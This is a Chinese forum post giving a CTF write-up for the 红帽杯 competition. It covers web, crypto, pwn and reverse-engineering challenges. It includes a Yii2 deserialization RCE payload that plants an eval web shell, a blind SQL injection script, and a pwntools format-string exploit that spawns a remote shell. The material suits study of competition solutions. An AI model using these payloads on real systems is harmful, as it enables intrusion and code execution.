设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 红帽杯 - WriteUp
返回列表 发新帖
查看: 2192|回复: 0

红帽杯 - WriteUp

[复制链接]
wholesome

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2021-5-13 10:22:31 | 显示全部楼层 |阅读模式
红帽杯 - WriteUp
Webfind_it




  1. <?php $link = mysql_connect('localhost', 'root'); ?>
  2. <html>
  3. <head>
  4. <title>Hello worldd!</title>
  5. <style>
  6. body {
  7.   background-color: white;
  8.   text-align: center;
  9.   padding: 50px;
  10.   font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
  11. }

  13. #logo {
  14.   margin-bottom: 40px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <img id="logo" src="logo.png" />
  20. <h1><?php echo "Hello My freind!"; ?></h1>
  21. <?php if($link) { ?>
  22.   <h2>I Can't view my php files?!</h2>
  23. <?php } else { ?>
  24.   <h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
  25. <?php } ?>
  26. </body>
  27. </html>
  28. <?php


  31. #Really easy...

  33. $file=fopen("flag.php","r") or die("Unable 2 open!");

  35. $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

  37. $hack=fopen("hack.php","w") or die("Unable 2 open");

  39. $a=$_GET['code'];

  41. if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
  42. die("you die");
  43. }
  44. if(strlen($a)>33){
  45. die("nonono.");
  46. }
  47. fwrite($hack,$a);
  48. fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

  50. fclose($file);
  51. fclose($hack);
  52. ?>
复制代码


flag{4afd7cef-709a-4b4f-a7c4-102c3b96f071}
framework


https://github.com/Maskhe/CVE-2020-15148-bypasses
https://mp.weixin.qq.com/s?__biz ... 79963&lang=zh_CN#rd
反序列化点:



/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjI6ImxzIjt9aToxO3M6MzoicnVuIjt9fX19

原来是 disable_function 里面把 system 给禁了 2-4
  1. ➜  phpggc git:(master) ✗ ./phpggc Yii2/RCE2 'eval($_REQUEST["ant"]);' | base64
  2. TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjIzOiJldmFsKCRfUkVRVUVTVFsiYW50Il0pOyI7fWk6MTtzOjE4OiJldmFsdWF0ZURlcGVuZGVuY3kiO319fQo=
复制代码



WebsiteManager


  1. import requests
  2. import string

  4. charset = ",@"+ string.digits + string.ascii_lowercase + string.ascii_uppercase

  6. def r(s):
  7.     s = s.replace(" ", "/**/")
  8.     return s

  10. sql = r("select concat(id,username,password) from users")
  11. result = ""
  12. for i in range(1,50):
  13.     for c in charset:
  14.         cc = ord(c)
  15.         url = f"http://eci-2zeir5o8p6vh6eotta01.cloudeci1.ichunqiu.com/image.php?id=-1/*
  16. */or/**/(ascii(mid(({sql}),{i},1))={cc})"
  17.         r = requests.get(url)
  18.         if len(r.text) > 1024:
  19.             result += c
  20.             print(result)
  21.             break
复制代码

账户admin 密码5396d7de771d5d61505b8直接ssrf 用file协议读flag


Misc签到


Cryptoprimegame近似原题,拿过来稍微修改一下就可以了 https://github.com/pcw109550/wri ... 20/KAPO/Baby_Bubmi/

flag{715c39c3-1b46-4c23-8006-27b43eba2446}
hpcurve
  1. import itertools
  2. import struct


  5. p = 10000000000000001119
  6. R.<x> = GF(p)[]
  7. y=x
  8. f = y + y^7
  9. C = HyperellipticCurve(f, 0)
  10. J = C.jacobian()
  11. Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

  13. enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
  14. print(len(enc))
  15. known_pt = 'aaaaaaaaaaaaaaaaaaaaflag'.encode()

  17. rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

  19. blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
  20. ui = [int.from_bytes(r, 'little') for r in blocks]
  21. print(ui)
  22. u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

  24. L = GF(p).algebraic_closure()
  25. roots = [r[0] for r in u.change_ring(L).roots()]

  27. RR.<zz> = PolynomialRing(L)
  28. v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
  29. vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
  30. vi = [(int(-c), int(c)) for c in vi]
  31. # print(vi)

  33. for rs in itertools.product(*vi):

  35.     print(rs)
  36.     q = struct.pack('<'+'Q'*len(rs), *rs)

  38.     flag = bytes(k^^m for k,m in zip(rng_output+q, enc))
  39.     print(flag)
复制代码
插值找到
  1. [9406735202825780999, 1215277151449350005, 4986131889746979161]
  2. (6799504737297016313, 4413307456031713654, 9350413817117071737)
  3. b'aaaaaaaaaaaaaaaaaaaaflag{1b82f60a-43ab-4f18-8ccc' // 目标
  4. (6799504737297016313, 4413307456031713654, 649586182882929382)
  5. b'aaaaaaaaaaaaaaaaaaaaflag{1b82f60a-43ab-4\xf9\xc2\xafD\xda\xff\xa3\xeb'
  6. (6799504737297016313, 5586692543968287465, 9350413817117071737)
  7. b'aaaaaaaaaaaaaaaaaaaaflag{1b82f60\xfe\xde\xe3z\x9a\xbe\x95Df18-8ccc'
  8. (6799504737297016313, 5586692543968287465, 649586182882929382)
  9. b'aaaaaaaaaaaaaaaaaaaaflag{1b82f60\xfe\xde\xe3z\x9a\xbe\x95D\xf9\xc2\xafD\xda\xff\xa3\xeb'
  10. (3200495262702984806, 4413307456031713654, 9350413817117071737)
  11. b'aaaaaaaaaaaaaaaaaaaaflag\xe4\xca\xf5\xbd\xc6\xa6\x00Ba-43ab-4f18-8ccc'
  12. (3200495262702984806, 4413307456031713654, 649586182882929382)
  13. b'aaaaaaaaaaaaaaaaaaaaflag\xe4\xca\xf5\xbd\xc6\xa6\x00Ba-43ab-4\xf9\xc2\xafD\xda\xff\xa3\xeb'
  14. (3200495262702984806, 5586692543968287465, 9350413817117071737)
  15. b'aaaaaaaaaaaaaaaaaaaaflag\xe4\xca\xf5\xbd\xc6\xa6\x00B\xfe\xde\xe3z\x9a\xbe\x95Df18-8ccc'
  16. (3200495262702984806, 5586692543968287465, 649586182882929382)
  17. b'aaaaaaaaaaaaaaaaaaaaflag\xe4\xca\xf5\xbd\xc6\xa6\x00B\xfe\xde\xe3z\x9a\xbe\x95D\xf9\xc2\xafD\xda\xff\xa3\xeb'
复制代码
还原信息
  1. keys = struct.pack("<QQQQQQ",9406735202825780999, 1215277151449350005, 4986131889746979161,6799504737297016313, 4413307456031713654, 9350413817117071737)
  2. # print(keys)
  3. enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
  4. leng = len(keys)
  5. keys = list(keys)
  6. flag = ""
  7. enc = list(enc)
  8. for i in range(len(enc)):
  9.     flag += chr(keys[i%leng]^^enc[i])
  10. print(flag)
  11. // flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}
复制代码
Pwnparserparsercontent-length=-1时有格式化字符串漏洞
  1. from pwn import *
  2. from urllib import quote
  3. context.log_level = 'debug'
  4. #p = process("./chall")
  5. p = remote("47.105.94.48", 12435)
  6. libc = ELF("./libc-2.27.so")
  7. code = '''GET / HTTP/1.0
  8. Content-Length:-1

  10. %p-%15$p-%211$p
  11. '''

  13. p.send(code)
  14. p.recvuntil("> ")
  15. stack = int(p.recv(14), 16)
  16. p.recvuntil("-")
  17. pie = int(p.recv(14), 16)
  18. p.recvuntil("-")
  19. libc.address = int(p.recv(14), 16)-0x7ffff7a05b97+0x7ffff79e4000
  20. ret_addr = stack - 0x7fffffffd8bf + 0x7fffffffdec8
  21. one = libc.address + 0x10a45c
  22. payload = "%"+str((one)&0xff)+"c%22$hhn"+p64(ret_addr)
  23. pad = 22-len(payload)
  24. payload = "A"*pad + "%"+str(one-pad&0xff)+"c%22$hhn"+p64(ret_addr)
  25. code = "GET / HTTP/1.0\nContent-Length:-1\n\n%s"%(payload)
  26. #icq2aadaa2801d9610eb6ac281ed140f
  27. p.send(code)
  28. payload = "%"+str((one>>8)&0xff)+"c%22$hhn"+p64(ret_addr+1)
  29. pad = 22-len(payload)
  30. payload = "A"*pad + "%"+str((one>>8)-pad&0xff)+"c%22$hhn"+p64(ret_addr+1)
  31. code = "GET / HTTP/1.0\nContent-Length:-1\n\n%s"%(payload)
  32. pause()
  33. p.send(code)
  34. payload = "%"+str((one>>16)&0xff)+"c%22$hhn"+p64(ret_addr+2)
  35. pad = 22-len(payload)
  36. payload = "A"*pad + "%"+str((one>>16)-pad&0xff)+"c%22$hhn"+p64(ret_addr+2)
  37. code = "GET / HTTP/1.0\nContent-Length:-1\n\n%s"%(payload)
  38. pause()
  39. p.send(code)
  40. payload = "%"+str((one>>24)&0xff)+"c%22$hhn"+p64(ret_addr+3)
  41. pad = 22-len(payload)
  42. payload = "A"*pad + "%"+str((one>>24)-pad&0xff)+"c%22$hhn"+p64(ret_addr+3)
  43. code = "GET / HTTP/1.0\nContent-Length:-1\n\n%s"%(payload)
  44. pause()
  45. p.send(code)
  46. payload = "%"+str((one>>32)&0xff)+"c%22$hhn"+p64(ret_addr+4)
  47. pad = 22-len(payload)
  48. payload = "A"*pad + "%"+str((one>>32)-pad&0xff)+"c%22$hhn"+p64(ret_addr+4)
  49. code = "GET / HTTP/1.0\nContent-Length:-1\n\n%s"%(payload)
  50. pause()
  51. p.send(code)
  52. pause()
  53. p.sendline("./getflag")
  54. p.sendline("icq2aadaa2801d9610eb6ac281ed140f")
  55. p.interactive()
复制代码
ReverseezRev
  1. #!/usr/bin/env python3
  2. def xtea_dec(f, key):
  3.   j = 0x9E3779B9
  4.   s = j * 32
  5.   for i in range(32):
  6.     f[1] -
  7. = (((f[0] << 4) ^ (f[0] >> 5)) + f[0]) ^ (s + key[(s >> 11) & 3])
  8.     s -= j
  9.     f[0] -= (((f[1] << 4) ^ (f[1] >> 5)) + f[1]) ^ (s + key[s & 3])
  10.   key[0] += 789;
  11.   key[3] += 135;
  12.   return f, key
  13.   
  14. def main():
  15.   key = [424242, 325477, 523007, 424242]
  16.   enc_flag = [
  17.     (0xD118C7B2, 0x7FC3F3A8),
  18.     (0x4A19F2DA, 0x472469E1),
  19.     (0x7C682864, 0x50C0E3D1),
  20.     (0x0C595670B, 0x2EE07578),
  21.     (0x0D040A3F0, 0x0C5590286),
  22.     (0x0D82B07A8, 0x0D5978C2C),
  23.     (0x4E2BC556, 0x79E2E90),
  24.     (0x0C7A353B5, 0x493995B),
  25.   ]
  26.   for f in enc_flag:
  27.      dec_f, key = xtea_dec(f, key)
  28.      print(dec_f[0], dec_f[1])
  29.    
  30. if __name__ == "__main__":
  31.    main()<span style="background-color: rgb(255, 255, 255);"> </span>
复制代码



回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-21 05:30 , Processed in 0.115519 second(s), 72 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表